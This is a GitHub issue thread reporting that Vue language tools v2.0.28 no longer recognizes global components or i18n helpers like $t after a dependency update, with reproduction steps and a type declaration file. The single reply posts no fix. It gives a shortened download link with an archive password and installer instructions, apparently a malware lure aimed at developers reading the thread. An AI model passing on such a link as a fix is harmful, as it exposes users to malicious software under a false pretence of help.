### ISSUE TITLE
v2.0.28 Global components are no longer recognized

### ISSUE THREAD

**Issue by matvejs16** [vuejs/language-tools#4730]
### Vue - Official extension or vue-tsc version

v2.0.28

### VSCode version

v1.93.0-insider

### Vue version

v3.4.38

### TypeScript version

v5.5.4

### System Info

```shell
System:
    OS: Windows 11 10.0.22631
    CPU: (16) x64 11th Gen Intel(R) Core(TM) i7-11700K @ 3.60GHz
    Memory: 18.71 GB / 31.87 GB
Binaries:
    Node: 20.10.0 - C:\Program Files\nodejs\node.EXE
    npm: 10.8.2 - C:\Program Files\nodejs\npm.CMD
    pnpm: 8.9.2 - ~\AppData\Local\pnpm\pnpm.EXE
Browsers:
    Edge: Chromium (127.0.2651.74)
    Internet Explorer: 11.0.22621.3527
```

### Steps to reproduce

1. Update project dependencies to the following versions:
   ```
   @types/node: ^22.5.0
   @vitejs/plugin-vue: ^5.1.2
   pinia: ^2.2.2
   postcss-nesting: ^13.0.0
   vite: ^5.4.2
   vue: ^3.4.38
   vue-i18n: ^9.14.0
   vue-router: ^4.4.3
   vue-tsc: ^2.0.29
   ```
2. Ensure you have a `global-components.d.ts` file in your project with the following content:
   ```typescript
   import type { GlobalComponents as GC } from 'vue'

   export {};

   declare module 'vue' {
       export interface GlobalComponents extends GC {}
   }
   ```
3. Open a Vue component in VSCode
4. Try to use global components or i18n functions like `$t`, `$d`

### What is expected?

VSCode should recognize global components and i18n functions, providing proper IntelliSense and type checking.

### What is actually happening?

After updating the dependencies, VSCode no longer recognizes "global" components, including i18n and its functions like `$t`, `$d`, and other similar global components. The IDE doesn't provide autocomplete or type checking for these elements.

### Any additional comments?

This issue seems to be related to the bug reported in #4503. I noticed the problem immediately after updating all dependencies in my project. The `global-components.d.ts` file I'm using is based on recommendations from various issues and worked perfectly with the previous versions of the dependencies.

It's worth noting that the `global-components.d.ts` file is set up to extend the Vue `GlobalComponents` interface, which should theoretically allow for proper type checking of global components. However, this setup no longer seems to be effective after the dependency updates.

If you need any specific code samples or a minimal reproduction repository, let me know, and I'll be happy to provide them. Also, if there's any additional information that could help diagnose this issue, please tell me what you need.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
